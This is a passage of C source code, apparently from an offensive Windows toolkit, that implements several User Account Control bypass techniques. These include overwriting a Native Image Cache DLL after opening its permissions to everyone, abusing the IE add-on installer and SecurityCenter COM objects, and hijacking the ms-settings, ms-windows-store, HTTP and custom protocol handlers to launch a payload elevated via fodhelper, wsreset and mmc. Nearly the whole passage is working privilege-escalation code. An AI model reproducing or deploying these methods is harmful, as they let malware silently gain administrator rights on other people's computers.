    hFile = CreateFile(szFileName,
        GENERIC_READ,
        FILE_SHARE_READ | FILE_SHARE_WRITE | FILE_SHARE_DELETE,
        NULL,
        OPEN_EXISTING,
        0,
        NULL);

    if (hFile != INVALID_HANDLE_VALUE) {
        bResult = GetFileTime(hFile, NULL, NULL, LastWriteTime);
        CloseHandle(hFile);
    }

    return bResult;
}

/*
* ucmNICPoisonMethod
*
* Purpose:
*
* Bypass UAC by Dll hijack of Native Image Cache.
*
*/
NTSTATUS ucmNICPoisonMethod(
    _In_ PVOID ProxyDll,
    _In_ DWORD ProxyDllSize
)
{
    NTSTATUS MethodResult = STATUS_ACCESS_DENIED;
    WCHAR szFileName[MAX_PATH * 2];
    WCHAR szTargetProc[MAX_PATH * 2];
    DWORD origSize = 0, bytesIO;
    PBYTE origFileBuffer = NULL;
    HANDLE hFile;
    LPWSTR oldSecurity = NULL;
    LPWSTR lpAssemblyFilePath = NULL, lpTargetFileName = NULL;
    BOOLEAN IsWin7, bSecurityReset = FALSE;
    FILETIME lastWriteTime, checkTime;
    INT iRetryCount = 50;
    GUID targetMVID;
    FUSION_SCAN_PARAM scanParam;

    do {

        IsWin7 = (g_ctx->dwBuildNumber < NT_WIN8_RTM);

        if (!fusUtilInitFusion(IsWin7 ? 2 : 4))
            break;

        if (!fusUtilGetAssemblyPathByName(ASSEMBLY_ACCESSIBILITY, &lpAssemblyFilePath))
            break;

        if (!fusUtilGetImageMVID(lpAssemblyFilePath, &targetMVID))
            break;

        if (!IsWin7) {

            ucmxNgenLogLastWrite(&lastWriteTime);

            //
            // Run NET maintenance tasks.
            //
            _strcpy(szFileName, g_ctx->szSystemDirectory);
            _strcat(szFileName, MSCHEDEXE_EXE);

            if (!supRunProcess2(szFileName,
                TEXT("Start"),
                NULL,
                SW_HIDE,
                SUPRUNPROCESS_TIMEOUT_DEFAULT))
            {
                break;
            }

            //
            // Wait for task completion.
            //
            do {
                Sleep(2000);
                if (FALSE == supIsProcessRunning(TEXT("ngentask.exe"))) {
                    if (ucmxNgenLogLastWrite(&checkTime)) {
                        if (CompareFileTime(&lastWriteTime, &checkTime) < 0) {
                            break;
                        }
                    }
                }
                --iRetryCount;
            } while (iRetryCount);

        }

        //
        // Locate target NI file.
        //
        scanParam.ReferenceMVID = &targetMVID;
        scanParam.lpFileName = NULL;

        _strcpy(szFileName, g_ctx->szSystemRoot);
        _strcat(szFileName, TEXT("assembly\\NativeImages_"));
        if (IsWin7)
            _strcat(szFileName, NET2_DIR);
        else
            _strcat(szFileName, NET4_DIR);
#ifdef _WIN64
        _strcat(szFileName, TEXT("_64"));
#else
        _strcat(szFileName, TEXT("_32"));
#endif
        _strcat(szFileName, TEXT("\\Accessibility\\"));

        if (!fusUtilScanDirectory(szFileName,
            TEXT("*.dll"),
            (pfnFusionScanFilesCallback)fusUtilFindFileByMVIDCallback,
            &scanParam))
        {
            break;
        }

        lpTargetFileName = scanParam.lpFileName;
        if (lpTargetFileName == NULL)
            break;

        //
        // Read existing file to memory.
        //
        origFileBuffer = supReadFileToBuffer(lpTargetFileName, &origSize);
        if (origFileBuffer == NULL)
            break;

        //
        // Remember old file security permissions.
        //
        oldSecurity = NULL;
        if (!ucmMasqueradedGetObjectSecurityCOM(lpTargetFileName,
            DACL_SECURITY_INFORMATION,
            SE_FILE_OBJECT,
            &oldSecurity))
        {
            break;
        }

        //
        // Reset target file permissions.
        //
        if (!ucmMasqueradedSetObjectSecurityCOM(lpTargetFileName,
            DACL_SECURITY_INFORMATION,
            SE_FILE_OBJECT,
            T_SDDL_ALL_FOR_EVERYONE))
        {
            break;
        }

        bSecurityReset = TRUE;

        //
        // Overwrite file with Fubuki.
        //
        hFile = CreateFile(lpTargetFileName,
            GENERIC_WRITE,
            0,
            NULL,
            OPEN_EXISTING,
            0,
            NULL);

        if (hFile != INVALID_HANDLE_VALUE) {
            WriteFile(hFile, ProxyDll, ProxyDllSize, &bytesIO, NULL);
            SetEndOfFile(hFile);
            CloseHandle(hFile);
        }
        else
            break;

        //
        // Run target.
        //
        _strcpy(szTargetProc, g_ctx->szSystemDirectory);
        _strcat(szTargetProc, MMC_EXE);

        if (supRunProcess2(szTargetProc,
            WF_MSC,
            NULL,
            SW_SHOW,
            SUPRUNPROCESS_TIMEOUT_DEFAULT))
        {
            MethodResult = STATUS_SUCCESS;
        }

    } while (FALSE);

    if (lpAssemblyFilePath)
        supHeapFree(lpAssemblyFilePath);

    //
    // Restore original file contents and permissions.
    //
    if (origFileBuffer) {
        if (lpTargetFileName) {
            hFile = CreateFile(lpTargetFileName,
                GENERIC_WRITE,
                0,
                NULL,
                OPEN_EXISTING,
                0,
                NULL);

            if (hFile != INVALID_HANDLE_VALUE) {
                WriteFile(hFile, origFileBuffer, origSize, &bytesIO, NULL);
                SetEndOfFile(hFile);
                CloseHandle(hFile);
            }
        }
        supVirtualFree(origFileBuffer, NULL);
    }

    if (oldSecurity) {
        if (bSecurityReset && lpTargetFileName) {
            ucmMasqueradedSetObjectSecurityCOM(lpTargetFileName,
                DACL_SECURITY_INFORMATION,
                SE_FILE_OBJECT,
                oldSecurity);
        }
        CoTaskMemFree(oldSecurity);
    }

    if (lpTargetFileName) {
        supHeapFree(lpTargetFileName);
    }

    if (!NT_SUCCESS(MethodResult))
        supSetGlobalCompletionEvent();

    return MethodResult;
}

/*
* ucmIeAddOnInstallMethod
*
* Purpose:
*
* Bypass UAC by IE Admin Add-On Installer COM object.
*
*/
NTSTATUS ucmIeAddOnInstallMethod(
    _In_ PVOID ProxyDll,
    _In_ DWORD ProxyDllSize
)
{
    NTSTATUS MethodResult = STATUS_ACCESS_DENIED;
    HRESULT r = E_FAIL, hr_init;
    IIEAdminBrokerObject* BrokerObject = NULL;
    IActiveXInstallBroker* InstallBroker = NULL;
    BSTR adminInstallerUuid = NULL;
    BSTR cacheItemFilePath = NULL, fileToVerify = NULL;
    ULONG dummy = 0;
    PUCHAR dummyPtr = NULL;
    PWCHAR lpPayloadFile = NULL, lpTargetDir = NULL, lpFileName = NULL, lpDirectory = NULL;
    SIZE_T cchBuffer;
    HANDLE processHandle = NULL;
    BSTR workdirBstr, emptyBstr;
    WCHAR szDummyTarget[MAX_PATH * 2];

    hr_init = CoInitializeEx(NULL, COINIT_APARTMENTTHREADED);

    do {

        if (!supReplaceDllEntryPoint(
            ProxyDll,
            ProxyDllSize,
            FUBUKI_DEFAULT_ENTRYPOINT,
            TRUE))
        {
            break;
        }

        //
        // VerifyFile required.
        //
        HRESULT_BREAK_ON_FAILED(
            CoInitializeSecurity(NULL,
                -1,
                NULL,
                NULL,
                RPC_C_AUTHN_LEVEL_CONNECT,
                RPC_C_IMP_LEVEL_IMPERSONATE,
                NULL,
                0,
                NULL));

        //
        // Allocate elevated factory object.
        //
        HRESULT_BREAK_ON_FAILED(
            ucmAllocateElevatedObject(T_CLSID_IEAAddonInstaller,
                &IID_IEAxiAdminInstaller,
                CLSCTX_LOCAL_SERVER,
                &BrokerObject));

        HRESULT_BREAK_ON_FAILED(
            BrokerObject->lpVtbl->InitializeAdminInstaller(BrokerObject,
                NULL,
                0,
                &adminInstallerUuid));

        //
        // Query install broker object.
        //
        HRESULT_BREAK_ON_FAILED(
            BrokerObject->lpVtbl->QueryInterface(BrokerObject,
                &IID_IEAxiInstaller2,
                &InstallBroker));

        _strcpy(szDummyTarget, g_ctx->szSystemDirectory);
        _strcat(szDummyTarget, CONSENT_EXE);

        //
        // Verify image embedded signature.
        // Upon success copy given file to the temporary directory and return full filepath.
        //
        fileToVerify = SysAllocString(szDummyTarget);
        if (fileToVerify) {

            r = InstallBroker->lpVtbl->VerifyFile(InstallBroker,
                adminInstallerUuid,
                (HWND)INVALID_HANDLE_VALUE,
                fileToVerify,
                fileToVerify,
                NULL,
                WTD_UI_NONE,
                WTD_UICONTEXT_EXECUTE,
                &IID_IUnknown,
                &cacheItemFilePath,
                &dummy,
                &dummyPtr);

            CoTaskMemFree(dummyPtr);
            SysFreeString(fileToVerify);
        }

        HRESULT_BREAK_ON_FAILED(r);

        //
        // Kill file in cache
        //
        if (!ucmMasqueradedDeleteDirectoryFileCOM(cacheItemFilePath))
            break;

        //
        // Replace file in cache with Fubuki.
        //
        cchBuffer = (SIZE_T)SysStringLen(cacheItemFilePath);

        lpPayloadFile = (PWCHAR)supHeapAlloc(cchBuffer * 2);
        if (lpPayloadFile == NULL)
            break;

        lpTargetDir = (PWCHAR)supHeapAlloc(cchBuffer * 2);
        if (lpTargetDir == NULL)
            break;

        lpFileName = _filename(cacheItemFilePath);
        if (lpFileName == NULL)
            break;

        _strcpy(lpPayloadFile, g_ctx->szTempDirectory);
        _strcat(lpPayloadFile, lpFileName);

        if (!supWriteBufferToFile(lpPayloadFile, ProxyDll, ProxyDllSize))
            break;

        lpDirectory = _filepath(cacheItemFilePath, lpTargetDir);
        if (lpDirectory == NULL)
            break;

        if (!ucmMasqueradedMoveCopyFileCOM(lpPayloadFile, lpDirectory, TRUE))
            break;

        //
        // Run file from cache.
        //
        workdirBstr = SysAllocString(g_ctx->szTempDirectory);
        if (workdirBstr) {

            emptyBstr = SysAllocString(TEXT(""));
            if (emptyBstr) {

                r = InstallBroker->lpVtbl->RunSetupCommand(InstallBroker,
                    adminInstallerUuid,
                    NULL,
                    cacheItemFilePath,
                    emptyBstr,
                    workdirBstr,
                    emptyBstr,
                    4, //RSC_FLAG_QUIET
                    &processHandle); //there is always no process handle on output, ignore.

                SysFreeString(emptyBstr);
            }

            SysFreeString(workdirBstr);

            if (r == E_INVALIDARG)
                MethodResult = STATUS_SUCCESS;
        }

    } while (FALSE);

    //
    // Post execution cleanup.
    //
    if (InstallBroker)
        InstallBroker->lpVtbl->Release(InstallBroker);

    if (BrokerObject)
        BrokerObject->lpVtbl->Release(BrokerObject);

    if (adminInstallerUuid)
        SysFreeString(adminInstallerUuid);

    if (NT_SUCCESS(MethodResult) && lpDirectory) {
        ucmMasqueradedDeleteDirectoryFileCOM(lpDirectory);
    }

    if (cacheItemFilePath)
        SysFreeString(cacheItemFilePath);

    if (lpTargetDir)
        supHeapFree(lpTargetDir);

    if (lpPayloadFile)
        supHeapFree(lpPayloadFile);

    if (hr_init == S_OK)
        CoUninitialize();

    return MethodResult;
}

/*
* ucmWscActionProtocolMethod
*
* Purpose:
*
* Bypass UAC by SecurityCenter COM object and HTTP protocol registry hijack.
*
*/
NTSTATUS ucmWscActionProtocolMethod(
    _In_ LPCWSTR lpszPayload
)
{
    NTSTATUS MethodResult = STATUS_ACCESS_DENIED;
    HRESULT r = E_FAIL, hr_init;
    IWscAdmin* WscAdminObject = NULL;
    LPOLESTR protoGuidString = NULL;
    USER_ASSOC_PTR SetUserAssoc;
    GUID guid;

    RtlSecureZeroMemory(&SetUserAssoc, sizeof(USER_ASSOC_PTR));

    hr_init = CoInitializeEx(NULL, COINIT_APARTMENTTHREADED);

    do {

        if (CoCreateGuid(&guid) != S_OK)
            break;

        if (StringFromCLSID(&guid, &protoGuidString) != S_OK)
            break;

        MethodResult = supFindUserAssocSet(&SetUserAssoc);
        if (!NT_SUCCESS(MethodResult)) {
            break;
        }

        MethodResult = supRegisterShellAssoc(T_PROTO_HTTP,
            protoGuidString,
            &SetUserAssoc,
            lpszPayload,
            FALSE,
            NULL);

        if (!NT_SUCCESS(MethodResult)) {
            break;
        }

        MethodResult = STATUS_ACCESS_DENIED;

        r = ucmAllocateElevatedObject(T_CLSID_SecurityCenter,
            &IID_WscAdmin,
            CLSCTX_LOCAL_SERVER,
            &WscAdminObject);

        if (SUCCEEDED(r)) {

            r = WscAdminObject->lpVtbl->Initialize(WscAdminObject);
            if (SUCCEEDED(r)) {

                supEnableToastForProtocol(T_PROTO_HTTP, FALSE);

                r = WscAdminObject->lpVtbl->DoModalSecurityAction(WscAdminObject,
                    NULL,
                    103,
                    NULL);

                Sleep(1000);

                if (SUCCEEDED(r))
                    MethodResult = STATUS_SUCCESS;
            }
        }

    } while (FALSE);

    //
    // Cleanup.
    //
    if (WscAdminObject)
        WscAdminObject->lpVtbl->Release(WscAdminObject);

    if (protoGuidString) {
        supUnregisterShellAssoc(T_PROTO_HTTP, protoGuidString, &SetUserAssoc);
        CoTaskMemFree(protoGuidString);
    }

    if (hr_init == S_OK)
        CoUninitialize();

    return MethodResult;
}

/*
* ucmFwCplLuaMethod2
*
* Purpose:
*
* Bypass UAC using FwCplLua undocumented COM interface and shell association registry hijack.
* This function expects that supMasqueradeProcess was called on process initialization.
*
* Note:
*
* Protocol name defined as const (e.g. pe386).
* ProgId generated with CoCreateGuid and will be different each run.
*
*/
NTSTATUS ucmFwCplLuaMethod2(
    _In_ LPCWSTR lpszPayload
)
{
    BOOL fEnvSet = FALSE, fDirCreated = FALSE;
    NTSTATUS MethodResult = STATUS_ACCESS_DENIED;
    HRESULT r = E_FAIL, hr_init;
    ULONG DataSize = 0, SnapinSize = 0;
    SIZE_T nLen, PayloadDirNameLen = 0, MscBufferSize = 0, MscSize = 0, MscBytesIO = 0, ProtocolNameLen;
    PVOID SnapinResource = NULL, SnapinData = NULL, MscBufferPtr = NULL;
    PVOID ImageBaseAddress = g_hInstance;
    LPOLESTR protoGuidString = NULL;
    CHAR* pszMarker;
    IFwCplLua* FwCplLua = NULL;
    USER_ASSOC_PTR SetUserAssoc;
    GUID guid;
    WCHAR szBuffer[MAX_PATH + 1];
    WCHAR szPayloadDir[MAX_PATH * 2];
    CHAR szProtocol[MAX_PATH];

    hr_init = CoInitializeEx(NULL, COINIT_APARTMENTTHREADED);

    RtlSecureZeroMemory(&SetUserAssoc, sizeof(USER_ASSOC_PTR));
    RtlSecureZeroMemory(&szPayloadDir, sizeof(szPayloadDir));

    do {

        //
        // Create GUID.
        //
        if (CoCreateGuid(&guid) != S_OK)
            break;

        if (StringFromCLSID(&guid, &protoGuidString) != S_OK)
            break;

        //
        // Convert protocol name to ANSI to be used in msc modification next.
        //
        ProtocolNameLen = _strlen(MYSTERIOUSCUTETHING);
        RtlSecureZeroMemory(szProtocol, sizeof(szProtocol));
        WideCharToMultiByte(CP_ACP, 0, MYSTERIOUSCUTETHING, -1, szProtocol, sizeof(szProtocol), NULL, NULL);
        _strcat_a(szProtocol, ":");

        //
        // Decrypt and decompress custom Kamikaze snap-in.
        //
        SnapinResource = supLdrQueryResourceData(
            KAMIKAZE_ID,
            ImageBaseAddress,
            &DataSize);

        if (SnapinResource) {
            SnapinData = g_ctx->DecompressRoutine(KAMIKAZE_ID, SnapinResource, DataSize, &SnapinSize);
            if (SnapinData == NULL)
                break;
        }
        else
            break;

        //
        // Create destination dir "system32" in %temp%
        //
        _strcpy(szPayloadDir, g_ctx->szTempDirectory);
        _strcat(szPayloadDir, SYSTEM32_DIR_NAME);
        PayloadDirNameLen = _strlen(szPayloadDir);

        if (!CreateDirectory(szPayloadDir, NULL)) {
            if (GetLastError() != ERROR_ALREADY_EXISTS)
                break;
        }

        fDirCreated = TRUE;

        //
        // Set new %windir% environment variable.
        //
        _strcpy(szBuffer, g_ctx->szTempDirectory);
        nLen = _strlen(szBuffer);
        if (szBuffer[nLen - 1] == L'\\') {
            szBuffer[nLen - 1] = 0;
        }

        fEnvSet = supSetEnvVariable(FALSE, NULL, T_WINDIR, szBuffer);
        if (fEnvSet == FALSE)
            break;

        //
        // Find UserAssocSet
        //
        MethodResult = supFindUserAssocSet(&SetUserAssoc);
        if (!NT_SUCCESS(MethodResult))
            break;

        //
        // Register shell protocol.
        //
        MethodResult = supRegisterShellAssoc(MYSTERIOUSCUTETHING,
            protoGuidString,
            &SetUserAssoc,
            lpszPayload,
            TRUE,
            NULL);

        if (!NT_SUCCESS(MethodResult))
            break;

        MscBufferSize = ALIGN_UP_BY(1 + (SIZE_T)SnapinSize + (SIZE_T)sizeof(szProtocol), (SIZE_T)PAGE_SIZE);

        MscBufferPtr = supVirtualAlloc(
            &MscBufferSize,
            DEFAULT_ALLOCATION_TYPE,
            DEFAULT_PROTECT_TYPE,
            NULL);

        if (MscBufferPtr == NULL)
            break;

        //
        // Reconfigure msc snapin and write it to the %temp%\system32.
        //
        pszMarker = _strstri_a((CHAR*)SnapinData, (const CHAR*)KAMIKAZE_MARKER);
        if (pszMarker) {

            //
            // Copy first part of snapin (unchanged).
            //
            MscBytesIO = (ULONG)(pszMarker - (PCHAR)SnapinData);
            MscSize = MscBytesIO;
            RtlCopyMemory(MscBufferPtr, SnapinData, MscBytesIO);

            //
            // Copy modified part.
            //
            MscBytesIO = ProtocolNameLen;
            //Include ":" element.
            MscBytesIO++;

            //Copy guid.
            RtlCopyMemory(RtlOffsetToPointer(MscBufferPtr, MscSize), (PVOID)&szProtocol, MscBytesIO);
            MscSize += MscBytesIO;

            //
            // Copy all of the rest.
            //
            while (*pszMarker != 0 && *pszMarker != '<') {
                pszMarker++;
            }

            MscBytesIO = (ULONG)(((PCHAR)SnapinData + SnapinSize) - pszMarker);
            RtlCopyMemory(RtlOffsetToPointer(MscBufferPtr, MscSize), pszMarker, MscBytesIO);
            MscSize += MscBytesIO;

            //
            // Write result to the file.
            //
            _strcat(szPayloadDir, TEXT("\\"));
            _strcat(szPayloadDir, WF_MSC);

            if (!supWriteBufferToFile(szPayloadDir, MscBufferPtr, (ULONG)MscSize))
                break;

            supSecureVirtualFree(MscBufferPtr, MscBufferSize, NULL);
            MscBufferPtr = NULL;
        }

        //
        // Get elevated COM object for FwCplLua interface.
        //
        r = ucmAllocateElevatedObject(
            T_CLSID_FwCplLua,
            &IID_IFwCplLua,
            CLSCTX_LOCAL_SERVER,
            &FwCplLua);

        if (r != S_OK)
            break;

        if (FwCplLua == NULL) {
            break;
        }

        //
        // Execute method from FwCplLua interface.
        // This will trigger our payload as shell will attempt to run it.
        //
        r = FwCplLua->lpVtbl->LaunchAdvancedUI(FwCplLua);
        if (SUCCEEDED(r))
            MethodResult = STATUS_SUCCESS;

    } while (FALSE);

    //
    // Cleanup.
    //
    if (MscBufferPtr) {
        supSecureVirtualFree(MscBufferPtr, MscBufferSize, NULL);
    }

    if (SnapinData) {
        supSecureVirtualFree(SnapinData, SnapinSize, NULL);
    }

    if (FwCplLua != NULL) {
        FwCplLua->lpVtbl->Release(FwCplLua);
    }

    Sleep(2000);

    if (protoGuidString) {
        supUnregisterShellAssoc(MYSTERIOUSCUTETHING, protoGuidString, &SetUserAssoc);
        CoTaskMemFree(protoGuidString);
    }

    if (hr_init == S_OK)
        CoUninitialize();

    if (fEnvSet)
        supSetEnvVariable(TRUE, NULL, T_WINDIR, NULL);

    if (fDirCreated) {
        DeleteFile(szPayloadDir);
        szPayloadDir[PayloadDirNameLen] = 0;
        RemoveDirectory(szPayloadDir);
    }

    return MethodResult;
}

/*
* ucmMsSettingsProtocolMethod
*
* Purpose:
*
* Bypass UAC by registering own ms-settings protocol.
*
*/
NTSTATUS ucmMsSettingsProtocolMethod(
    _In_ LPCWSTR lpszPayload
)
{
    NTSTATUS MethodResult = STATUS_ACCESS_DENIED;
    HRESULT hr_init;
    LPOLESTR protoGuidString = NULL;
    USER_ASSOC_PTR SetUserAssoc;
    GUID guid;
    WCHAR szBuffer[MAX_PATH * 2];

    RtlSecureZeroMemory(&SetUserAssoc, sizeof(USER_ASSOC_PTR));

    hr_init = CoInitializeEx(NULL, COINIT_MULTITHREADED);

    do {

        if (CoCreateGuid(&guid) != S_OK)
            break;

        if (StringFromCLSID(&guid, &protoGuidString) != S_OK)
            break;

        //
        // Find UserAssocSet
        //
        MethodResult = supFindUserAssocSet(&SetUserAssoc);
        if (!NT_SUCCESS(MethodResult))
            break;

        //
        // Register shell protocol.
        //
        MethodResult = supRegisterShellAssoc(T_MSSETTINGS,
            protoGuidString,
            &SetUserAssoc,
            lpszPayload,
            TRUE,
            NULL);

        if (NT_SUCCESS(MethodResult)) {

            _strcpy(szBuffer, g_ctx->szSystemDirectory);
            _strcat(szBuffer, FODHELPER_EXE);

            MethodResult = supRunProcess(szBuffer, NULL) ? STATUS_SUCCESS : STATUS_ACCESS_DENIED;
        }

    } while (FALSE);

    //
    // Cleanup.
    //
    if (protoGuidString) {
        supUnregisterShellAssoc(T_MSSETTINGS, protoGuidString, &SetUserAssoc);
        CoTaskMemFree(protoGuidString);
    }

    if (SUCCEEDED(hr_init))
        CoUninitialize();

    return MethodResult;
}

/*
* ucmxGetServiceState
*
* Purpose:
*
* Return service state.
*
*/
DWORD ucmxGetServiceState(
    _In_ SC_HANDLE ServiceHandle
)
{
    SERVICE_STATUS_PROCESS svcStatus;
    ULONG dummy;

    if (QueryServiceStatusEx(
        ServiceHandle,
        SC_STATUS_PROCESS_INFO,
        (LPBYTE)&svcStatus,
        sizeof(svcStatus),
        &dummy))
    {
        return svcStatus.dwCurrentState;
    }

    return SERVICE_STOPPED;
}

/*
* ucmxRunService
*
* Purpose:
*
* Start given service if stopped.
*
*/
BOOLEAN ucmxRunService(
    _In_ LPCWSTR lpServiceName
)
{
    BOOLEAN bRunning = FALSE;
    SC_HANDLE schManager = NULL, schService = NULL;
    ULONG dwState, uRetryCount;

    do {

        schManager = OpenSCManager(
            NULL,
            SERVICES_ACTIVE_DATABASE,
            SC_MANAGER_CONNECT);

        if (schManager == NULL)
            break;

        schService = OpenService(
            schManager,
            lpServiceName,
            SERVICE_QUERY_STATUS | SERVICE_START);

        if (schService == NULL)
            break;

        dwState = ucmxGetServiceState(schService);
        if (dwState == SERVICE_RUNNING) {
            bRunning = TRUE;
            break;
        }

        if (dwState == SERVICE_PAUSE_PENDING ||
            dwState == SERVICE_STOP_PENDING)
        {
            uRetryCount = 5;
            do {
                dwState = ucmxGetServiceState(schService);
                if (dwState == SERVICE_RUNNING) {
                    bRunning = TRUE;
                    break;
                }
                Sleep(1000);
            } while (--uRetryCount);
        }

        if (dwState == SERVICE_STOPPED) {
            if (StartService(schService, 0, NULL)) {
                Sleep(1000);
                dwState = ucmxGetServiceState(schService);
                if (dwState == SERVICE_RUNNING) {
                    bRunning = TRUE;
                    break;
                }
            }
        }

    } while (FALSE);

    if (schService)
        CloseServiceHandle(schService);

    if (schManager)
        CloseServiceHandle(schManager);

    return bRunning;
}

/*
* ucmxIsAppXSvcRunning
*
* Purpose:
*
* Return running state of AppXSvc (restart it if stopped).
*
*/
BOOLEAN ucmxIsAppXSvcRunning(
    VOID
)
{
    return ucmxRunService(T_APPXSVC);
}

/*
* ucmxCleanupNoStore
*
* Purpose:
*
* Remove store association key.
*
*/
VOID ucmxCleanupNoStore(
    VOID
)
{
    NTSTATUS ntStatus;
    HANDLE classesKey = NULL;
    WCHAR szBuffer[MAX_PATH + 1];

    ntStatus = supOpenClassesKey(NULL, &classesKey);
    if (!NT_SUCCESS(ntStatus))
        return;

    _strcpy(szBuffer, T_MSWINDOWSSTORE);
    _strcat(szBuffer, TEXT("\\shell"));
    supRegDeleteKeyRecursive(classesKey, szBuffer);

    NtClose(classesKey);
}

/*
* ucmxMsStoreProtocolNoStore
*
* Purpose:
*
* Bypass UAC by registering own ms-windows-store protocol.
*
*/
NTSTATUS ucmxMsStoreProtocolNoStore(
    _In_ LPCWSTR lpszPayload
)
{
    HANDLE classesKey = NULL, protoKey = NULL;
    NTSTATUS ntStatus;
    SIZE_T sz;
    WCHAR szBuffer[MAX_PATH + 1];

    ntStatus = supOpenClassesKey(NULL, &classesKey);
    if (!NT_SUCCESS(ntStatus))
        return ntStatus;

    if (ERROR_SUCCESS == RegCreateKeyEx(classesKey,
        T_MSWINDOWSSTORE,
        0,
        NULL,
        REG_OPTION_NON_VOLATILE,
        MAXIMUM_ALLOWED,
        NULL,
        (HKEY*)&protoKey,
        NULL))
    {
        RegSetValueEx(protoKey, T_URL_PROTOCOL, 0, REG_SZ, NULL, 0);
        RegCloseKey(protoKey);
    }

    _strcpy(szBuffer, T_MSWINDOWSSTORE);
    _strcat(szBuffer, T_SHELL_OPEN);
    _strcat(szBuffer, TEXT("\\"));
    _strcat(szBuffer, T_SHELL_COMMAND);

    if (ERROR_SUCCESS == RegCreateKeyEx(classesKey,
        szBuffer,
        0,
        NULL,
        REG_OPTION_NON_VOLATILE,
        MAXIMUM_ALLOWED,
        NULL,
        (HKEY*)&protoKey,
        NULL))
    {
        sz = (_strlen(lpszPayload) + 1) * sizeof(WCHAR);

        if (ERROR_SUCCESS == RegSetValueEx(protoKey,
            TEXT(""),
            0,
            REG_SZ,
            (BYTE*)lpszPayload,
            (DWORD)sz))
        {
            ntStatus = STATUS_SUCCESS;
        }
        else {
            ntStatus = STATUS_REGISTRY_IO_FAILED;
        }

        RegCloseKey(protoKey);
    }
    else {
        ntStatus = STATUS_REGISTRY_IO_FAILED;
    }

    NtClose(classesKey);

    return ntStatus;
}

/*
* ucmMsStoreProtocolMethod
*
* Purpose:
*
* Bypass UAC by registering own ms-windows-store protocol.
*
*/
NTSTATUS ucmMsStoreProtocolMethod(
    _In_ LPCWSTR lpszPayload
)
{
    NTSTATUS MethodResult = STATUS_ACCESS_DENIED;
    HRESULT hr_init;
    LPOLESTR protoGuidString = NULL;
    USER_ASSOC_PTR SetUserAssoc;
    GUID guid;
    BOOLEAN bAppXRunning = FALSE;
    WCHAR szBuffer[MAX_PATH * 2];

    RtlSecureZeroMemory(&SetUserAssoc, sizeof(USER_ASSOC_PTR));

    hr_init = CoInitializeEx(NULL, COINIT_APARTMENTTHREADED);

    do {

        bAppXRunning = ucmxIsAppXSvcRunning();
        if (bAppXRunning) {

            if (CoCreateGuid(&guid) != S_OK)
                break;

            if (StringFromCLSID(&guid, &protoGuidString) != S_OK)
                break;

            //
            // Find UserAssocSet
            //
            MethodResult = supFindUserAssocSet(&SetUserAssoc);
            if (!NT_SUCCESS(MethodResult)) {
                break;
            }

            supEnableToastForProtocol(T_MSWINDOWSSTORE, FALSE);

            //
            // Register shell protocol.
            //
            MethodResult = supRegisterShellAssoc(T_MSWINDOWSSTORE,
                protoGuidString,
                &SetUserAssoc,
                lpszPayload,
                TRUE,
                T_URL_MS_WIN_STORE);

        }
        else {

            //
            // AppXSvc not running or in inconsistent state, try other method.
            //
            MethodResult = ucmxMsStoreProtocolNoStore(lpszPayload);

        }

        if (NT_SUCCESS(MethodResult)) {

            _strcpy(szBuffer, g_ctx->szSystemDirectory);
            _strcat(szBuffer, WSRESET_EXE);

            MethodResult = supRunProcess2(
                szBuffer,
                NULL,
                TEXT("open"),
                SW_HIDE,
                INFINITE) ? STATUS_SUCCESS : STATUS_ACCESS_DENIED;

        }

    } while (FALSE);

    //
    // Cleanup.
    //
    if (bAppXRunning) {
        if (protoGuidString) {
            supUnregisterShellAssoc(T_MSWINDOWSSTORE, protoGuidString, &SetUserAssoc);
            CoTaskMemFree(protoGuidString);
        }
    }
    else {
        ucmxCleanupNoStore();
    }

    if (SUCCEEDED(hr_init))
        CoUninitialize();

    return MethodResult;
}

#define PCA_MONITOR_PROCESS_NORMAL          0
#define PCA_MONITOR_PROCESS_NOCHAIN         1
#define PCA_MONITOR_PROCESS_AS_INSTALLER    2

/*
* ucmxRemoveLoaderEntryFromRegistry
*
* Purpose:
*
* Cleanup registry entries.
*
*/
ULONG ucmxRemoveLoaderEntryFromRegistry(
    _In_ HKEY hRootKey,
    _In_ LPCWSTR lpRegPath,
    _In_ LPCWSTR lpLoaderName
)
{
    HKEY hKey = NULL; // initialized so the cleanup below never closes an uninitialized handle when RegOpenKeyEx fails
    DWORD i, dwValuesCount = 0, cchValue, dwType, cRemoved = 0;
    WCHAR szValue[MAX_PATH + 1];

    do {

        if (ERROR_SUCCESS != RegOpenKeyEx(hRootKey,
            lpRegPath,
            0,
            KEY_READ | KEY_SET_VALUE,
            &hKey))
        {
            break;
        }

        if (ERROR_SUCCESS != RegQueryInfoKey(hKey,
            NULL, NULL, NULL, NULL, NULL, NULL,
            &dwValuesCount,
            NULL, NULL, NULL, NULL))
        {
            break;
        }

        if (dwValuesCount == 0)
            break;

        RtlSecureZeroMemory(&szValue, sizeof(szValue));

        for (i = 0; i < dwValuesCount; i++) {

            dwType = 0;
            cchValue = MAX_PATH;

            if (ERROR_SUCCESS == RegEnumValue(hKey,
                i,
                (LPWSTR)&szValue,
                (LPDWORD)&cchValue,
                NULL,
                &dwType,
                NULL,
                NULL))
            {
                if (dwType == REG_BINARY) {
                    if (NULL != _strstri(szValue, lpLoaderName)) {
                        if (ERROR_SUCCESS == RegDeleteValue(hKey, szValue))
                            cRemoved++;
                    }
                }
                szValue[0] = 0;
            }
        }

    } while (FALSE);

    if (hKey)
        RegCloseKey(hKey);

    return cRemoved;
}

typedef struct _PCA_LOADER_BLOCK {
    ULONG OpResult;
    WCHAR szLoader[MAX_PATH
 + 1];
} PCA_LOADER_BLOCK;

/*
* ucmPcaMethod
*
* Purpose:
*
* Bypass UAC using Program Compatibility Assistant.
*
* AlwaysNotify compatible.
*
*/
NTSTATUS ucmPcaMethod(
    _In_ PVOID ProxyDll,
    _In_ DWORD ProxyDllSize
)
{
    BOOL fEnvSet = FALSE, fDirCreated = FALSE, fLoaderCreated = FALSE, fUsePca = TRUE;
    ULONG ulResult = 0, seedValue;
    NTSTATUS MethodResult = STATUS_ACCESS_DENIED, ntStatus;
    HRESULT hr_init;
    SIZE_T cchDirName = 0, nLen, viewSize = PAGE_SIZE;
    HANDLE hSharedSection = NULL, hSharedEvent = NULL;
    HANDLE hShellProcess = NULL;
    UNICODE_STRING uStrTaskhost = RTL_CONSTANT_STRING(TASKHOSTW_EXE);
    RPC_BINDING_HANDLE rpcHandle = NULL;
    RPC_STATUS rpcStatus;
    STARTUPINFO startupInfo;
    PROCESS_INFORMATION processInfo;
    PCA_LOADER_BLOCK* pvLoaderBlock = NULL;
    LARGE_INTEGER liValue;
    OBJECT_ATTRIBUTES obja;
    UNICODE_STRING usObjectName;
